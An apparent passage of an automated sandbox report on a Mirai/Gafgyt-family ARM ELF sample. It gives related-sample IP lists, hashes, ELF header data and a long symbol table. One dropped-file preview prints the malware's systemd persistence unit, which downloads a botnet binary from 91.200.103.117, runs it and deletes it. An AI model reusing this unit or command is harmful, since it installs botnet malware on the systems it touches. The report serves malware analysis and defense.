                                                  RdcuY1pZig.elfGet hashmaliciousGafgytBrowse
                                                  • 91.189.91.42
                                                  2xl3rbZjPq.elfGet hashmaliciousMiraiBrowse
                                                  • 185.125.190.26
                                                  QJ1MJ1roKY.elfGet hashmaliciousMiraiBrowse
                                                  • 91.189.91.42
                                                  INIT7CHna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 109.202.202.202
                                                  na.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  na.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  na.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  WgRaU3h4k8.elfGet hashmaliciousGafgytBrowse
                                                  • 109.202.202.202
                                                  RdcuY1pZig.elfGet hashmaliciousGafgytBrowse
                                                  • 109.202.202.202
                                                  QJ1MJ1roKY.elfGet hashmaliciousMiraiBrowse
                                                  • 109.202.202.202
                                                  CoNziwSE6M.elfGet hashmaliciousMiraiBrowse
                                                  • 109.202.202.202
                                                  dQ10NiRRby.elfGet hashmaliciousMiraiBrowse
                                                  • 109.202.202.202
                                                  LsR22LZMVs.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 109.202.202.202
                                                  COMBAHTONcombahtonGmbHDEna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.200.103.117
                                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.200.103.117
                                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.200.103.117
                                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.200.103.117
                                                  7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                                                  • 194.59.31.31
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 194.59.31.225
                                                  9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 194.59.30.201
                                                  6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 194.59.30.201
                                                  4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 194.59.30.201
                                                  y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  • 194.59.30.201
                                                  No context
                                                  No context
                                                  Process:/tmp/na.elf
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):297
                                                  Entropy (8bit):5.060253001935413
                                                  Encrypted:false
                                                  SSDEEP:6:z80WuKyRZAMzdK+ann0RJ5R0w+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniR3+GWRg+GWRuwjp+GWRut
                                                  MD5:136D85D19107D3A0F3CACF3DE2AA4463
                                                  SHA1:A1DBE225D09321968D01EDA9B91EBA25D1F01379
                                                  SHA-256:E34E61D40B4C90E67502824D121006D8238C1747A3D9993B0B324275506C5C5F
                                                  SHA-512:42AF6EF829640FEC24F98C0EF57026E309F23311D2A39C58ACA731F69C21502427BC1E12F959D4E5F565ECE5BCFD949C7A8BA6E70FA916FAD251C000DF08B9B4
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetarm7.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.
                                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):76
                                                  Entropy (8bit):3.7627880354948586
                                                  Encrypted:false
                                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                  Process:/tmp/na.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):27
                                                  Entropy (8bit):3.8100810205217304
                                                  Encrypted:false
                                                  SSDEEP:3:TgBDlT1N:TgB11N
                                                  MD5:2E8B62CD5B9D6203300E1A0F79554430
                                                  SHA1:B6FC563BCA171C6DFA5A420C367F090C08635F4D
                                                  SHA-256:54E95E1B4FCA83E6C469DA79E05EC42CB5F190B5731F28A9DFF280136B7DCFA6
                                                  SHA-512:81AA2A256AB3B2318A60A089336AB73F5257EF7F292F18A37EC069D7FDE400763D7BFA3D89586B610C80715A2443849E679559EB14DBF7C769869AA908067541
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/tmp/na.elf./tmp/nwlrbbmqbh
                                                  File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
                                                  Entropy (8bit):5.984875409135291
                                                  TrID:
                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                  File name:na.elf
                                                  File size:159'775 bytes
                                                  MD5:a90e60adfd6dcbfa16615dde5f96c3d4
                                                  SHA1:2f6619597f57c3f51885382742378f48c715411e
                                                  SHA256:0d02114b75777f43679564ba57a32e1e1fbe5c4ca4d759bd20f68657b08318fc
                                                  SHA512:49fc5b2a2f9e9adffc29d4065b3766a8865b89f9150cc02c0b0dd76f5485727fbb1c92c043a61c41207effc6dbac8c92cf1abbf14bfa94359852d55965fe5f6f
                                                  SSDEEP:3072:pX0ZAZk9ZrIE26aRE5/+kW5zmM+0/xJJNg3pu5M/9zXjjz:pEOy9ZU16aRE5/+k+zmMfJrg3poM/9zj
                                                  TLSH:45F32B46EA408A17C4D6277ABADF42453323AB64D7DB33069918BFF43F8679E0E23505
                                                  File Content Preview:.ELF..............(.........4...(.......4. ...(........p.v..........p...p...........................`x..`x..............`x..`x..`x.......t..............dx..dx..dx..................Q.td..................................-...L..................@-.,@...0....S

                                                  ELF header

                                                  Class:ELF32
                                                  Data:2's complement, little endian
                                                  Version:1 (current)
                                                  Machine:ARM
                                                  Version Number:0x1
                                                  Type:EXEC (Executable file)
                                                  OS/ABI:UNIX - System V
                                                  ABI Version:0
                                                  Entry Point Address:0x8194
                                                  Flags:0x4000002
                                                  ELF Header Size:52
                                                  Program Header Offset:52
                                                  Program Header Size:32
                                                  Number of Program Headers:5
                                                  Section Header Offset:124200
                                                  Section Header Size:40
                                                  Number of Section Headers:29
                                                  Header String Table Index:26
                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                  NULL0x00x00x00x00x0000
                                                  .initPROGBITS0x80d40xd40x100x00x6AX004
                                                  .textPROGBITS0x80f00xf00x1554c0x00x6AX0016
                                                  .finiPROGBITS0x1d63c0x1563c0x100x00x6AX004
                                                  .rodataPROGBITS0x1d6500x156500x20880x00x2A008
                                                  .ARM.extabPROGBITS0x1f6d80x176d80x180x00x2A004
                                                  .ARM.exidxARM_EXIDX0x1f6f00x176f00x1700x00x82AL204
                                                  .eh_framePROGBITS0x278600x178600x40x00x3WA004
                                                  .tbssNOBITS0x278640x178640x80x00x403WAT004
                                                  .init_arrayINIT_ARRAY0x278640x178640x40x00x3WA004
                                                  .fini_arrayFINI_ARRAY0x278680x178680x40x00x3WA004
                                                  .jcrPROGBITS0x2786c0x1786c0x40x00x3WA004
                                                  .gotPROGBITS0x278700x178700xac0x40x3WA004
                                                  .dataPROGBITS0x2791c0x1791c0x2d80x00x3WA004
                                                  .bssNOBITS0x27bf40x17bf40x711c0x00x3WA004
                                                  .commentPROGBITS0x00x17bf40xcac0x00x0001
                                                  .debug_arangesPROGBITS0x00x188a00x1400x00x0008
                                                  .debug_pubnamesPROGBITS0x00x189e00x2130x00x0001
                                                  .debug_infoPROGBITS0x00x18bf30x20430x00x0001
                                                  .debug_abbrevPROGBITS0x00x1ac360x6e20x00x0001
                                                  .debug_linePROGBITS0x00x1b3180xe760x00x0001
                                                  .debug_framePROGBITS0x00x1c1900x2b80x00x0004
                                                  .debug_strPROGBITS0x00x1c4480x8ca0x10x30MS001
                                                  .debug_locPROGBITS0x00x1cd120x118f0x00x0001
                                                  .debug_rangesPROGBITS0x00x1dea10x5580x00x0001
                                                  .ARM.attributesARM_ATTRIBUTES0x00x1e3f90x160x00x0001
                                                  .shstrtabSTRTAB0x00x1e40f0x1170x00x0001
                                                  .symtabSYMTAB0x00x1e9b00x59e00x100x0288344
                                                  .strtabSTRTAB0x00x243900x2c8f0x00x0001
                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                  EXIDX0x176f00x1f6f00x1f6f00x1700x1704.67780x4R 0x4.ARM.exidx
                                                  LOAD0x00x80000x80000x178600x178606.13920x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                  LOAD0x178600x278600x278600x3940x74b04.28790x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
                                                  TLS0x178640x278640x278640x00x80.00000x4R 0x4.tbss
                                                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                  .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  .symtab0x80d40SECTION<unknown>DEFAULT1
                                                  .symtab0x80f00SECTION<unknown>DEFAULT2
                                                  .symtab0x1d63c0SECTION<unknown>DEFAULT3
                                                  .symtab0x1d6500SECTION<unknown>DEFAULT4
                                                  .symtab0x1f6d80SECTION<unknown>DEFAULT5
                                                  .symtab0x1f6f00SECTION<unknown>DEFAULT6
                                                  .symtab0x278600SECTION<unknown>DEFAULT7
                                                  .symtab0x278640SECTION<unknown>DEFAULT8
                                                  .symtab0x278640SECTION<unknown>DEFAULT9
                                                  .symtab0x278680SECTION<unknown>DEFAULT10
                                                  .symtab0x2786c0SECTION<unknown>DEFAULT11
                                                  .symtab0x278700SECTION<unknown>DEFAULT12
                                                  .symtab0x2791c0SECTION<unknown>DEFAULT13
                                                  .symtab0x27bf40SECTION<unknown>DEFAULT14
                                                  .symtab0x00SECTION<unknown>DEFAULT15
                                                  .symtab0x00SECTION<unknown>DEFAULT16
                                                  .symtab0x00SECTION<unknown>DEFAULT17
                                                  .symtab0x00SECTION<unknown>DEFAULT18
                                                  .symtab0x00SECTION<unknown>DEFAULT19
                                                  .symtab0x00SECTION<unknown>DEFAULT20
                                                  .symtab0x00SECTION<unknown>DEFAULT21
                                                  .symtab0x00SECTION<unknown>DEFAULT22
                                                  .symtab0x00SECTION<unknown>DEFAULT23
                                                  .symtab0x00SECTION<unknown>DEFAULT24
                                                  .symtab0x00SECTION<unknown>DEFAULT25
                                                  $a.symtab0x80d40NOTYPE<unknown>DEFAULT1
                                                  $a.symtab0x1d63c0NOTYPE<unknown>DEFAULT3
                                                  $a.symtab0x80e00NOTYPE<unknown>DEFAULT1
                                                  $a.symtab0x1d6480NOTYPE<unknown>DEFAULT3
                                                  $a.symtab0x80f00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x81340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x81940NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x81d00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x822c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x83280NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x84800NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x869c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x87080NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x87780NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x8ba40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x92380NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x98540NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x9c640NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xa6640NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xac580NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xb3500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xba940NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xc2480NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xc6940NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xc9340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xce200NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xd2580NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xd8c00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xd9140NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xd9640NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xda080NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xda740NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xdcc00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xdec80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xdef40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xe1300NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xe2600NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xe3c40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xe51c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xe5840NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xe6100NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf1680NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf1c40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf1f80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf2f40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf35c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf4980NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf5740NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf6180NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xf6400NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfb480NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfb6c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfc0c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfcac0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfd900NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfdb80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfe000NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfe240NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfe480NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0xfedc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1006c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x100fc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x102380NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x102500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x103600NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x103700NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x103bc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x103dc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x105300NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10a7c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10b000NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10b040NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10b580NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10b680NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10c940NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10ea00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10fd00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x10fd80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x110600NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x111280NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1123c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x113800NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x113940NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x113e00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1142c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x114340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x114380NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x114640NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x114700NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1147c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1169c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x117ec0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x118080NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x118680NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x118d40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1198c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x119ac0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x11af00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x120380NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x120400NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x120480NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x120500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1210c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x121500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x128640NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x128ac0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x128e00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x129680NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x129740NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x129800NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12a180NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12b0c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12b4c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12bb40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12bf40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12c080NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12c480NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12c800NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12cb80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12cf80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12d580NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12d9c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12ddc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12e140NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12e580NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12edc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12f1c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x12fa80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1300c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1304c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1307c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x130bc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x131380NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x132b00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x133c00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x134900NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x135540NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x136040NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x136ec0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x137200NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x13a500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x13a700NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x13ad40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x13b040NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x13b340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x13b680NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x13c380NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x140980NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x141180NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1427c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x142ac0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x143f00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x14bbc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x14c5c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x14ca00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x14e500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x14ea40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x154140NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x155300NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x157e00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15b8c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15c2c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15c640NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15d200NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15d300NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15dd00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15df00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15e500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15e740NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15f400NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x15f900NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1608c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x160a40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x161b00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x161e00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x162040NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x162800NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x162a80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x162ec0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x163600NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x163a40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x163e80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1645c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x164a00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x164e80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x165280NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1656c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x165dc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x166240NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x166ac0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x166f00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x167600NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x167ac0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x168340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1687c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x168c00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x172700NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x173b00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x177700NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x17c100NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x17c500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x17d780NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x17d900NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x17e340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x17eec0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x17fac0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x180500NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x180e00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x181b80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x182b00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1839c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x183bc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x183d80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x185b00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x186740NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x187c00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x18de40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x191b00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x191f80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x192e80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x193340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1938c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x193940NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x193c40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1941c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x194240NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x194540NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x194ac0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x194b40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x194e40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1953c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x195440NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x195700NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x195f80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x196d40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x197940NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x197e80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x198400NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19c2c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19ca80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19cd40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19ce80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19cf00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19d540NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19df40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19e200NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19e340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19e480NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19e5c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19e840NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19ebc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19ed00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19fb00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x19ff40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a0340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a0740NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a0e00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a0f40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a12c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a2180NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a5bc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a6100NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a6340NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a6f00NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a7cc0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a90c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1a9e80NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1aa5c0NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1aa880NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1abe40NOTYPE<unknown>DEFAULT2
                                                  $a.symtab0x1b3d80NOTYPE<unknown>DEFAULT2
